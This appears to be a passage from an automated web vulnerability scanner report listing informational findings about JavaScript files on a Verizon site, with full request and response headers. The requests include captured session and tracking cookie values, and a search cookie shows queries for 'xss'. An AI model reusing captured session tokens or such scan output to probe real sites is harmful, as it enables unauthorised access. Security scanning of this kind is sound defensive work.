Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Date: Mon, 05 Sep 2011 22:21:43 GMT
Content-Length: 11182
Connection: keep-alive


var arrHost=(window.location.hostname).split('.');
var scbCkDom='.'+arrHost[arrHost.length-2]+'.'+arrHost[arrHost.length-1];
var d=document;
if(fnGetFullCookie('scbGreyNav')!=null){var scb1=fnGet
...[SNIP]...

27.13. https://www22.verizon.com/includes/javascript/scb31menu.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/scb31menu.js

Request

GET /includes/javascript/scb31menu.js HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Length: 23324
Date: Mon, 05 Sep 2011 22:21:44 GMT
Connection: keep-alive


var aMenu=new Array();
aMenu[0]='203,0,Home,http://www22.verizon.com,,/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx,/ForYourHome/MyAccount/Protected/Overview/MyOverview.aspx,1,
...[SNIP]...

27.14. https://www22.verizon.com/includes/javascript/scbsearch.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/scbsearch.js

Request

GET /includes/javascript/scbsearch.js HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Date: Mon, 05 Sep 2011 22:21:41 GMT
Content-Length: 10817
Connection: keep-alive


var scbSrcHref=(window.location.href).toLowerCase().substring(0,((window.location.href).toLowerCase().search(/goto=/)>-1)?(window.location.href).toLowerCase().search(/goto=/):999);
var scbSrcqDefau
...[SNIP]...

27.15. https://www22.verizon.com/includes/javascript/sitewise.js/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/sitewise.js/

Request

GET /includes/javascript/sitewise.js/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://search.verizon.com/?market=94531+zz&q=oss+sq&rv=b&st=zz&tp=c&u1=q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Length: 10531
Date: Mon, 05 Sep 2011 22:21:59 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:26:59 GMT; path=/includes/; domain=verizon.com


// START OF SDC Advanced Tracking Code
// Copyright (c) 1996-2005 WebTrends Inc. All rights reserved.
// V8.0
// $DateTime: 2006/05/02 08:33:13 $

var gService = true;
var gTimeZone = -6;

...[SNIP]...
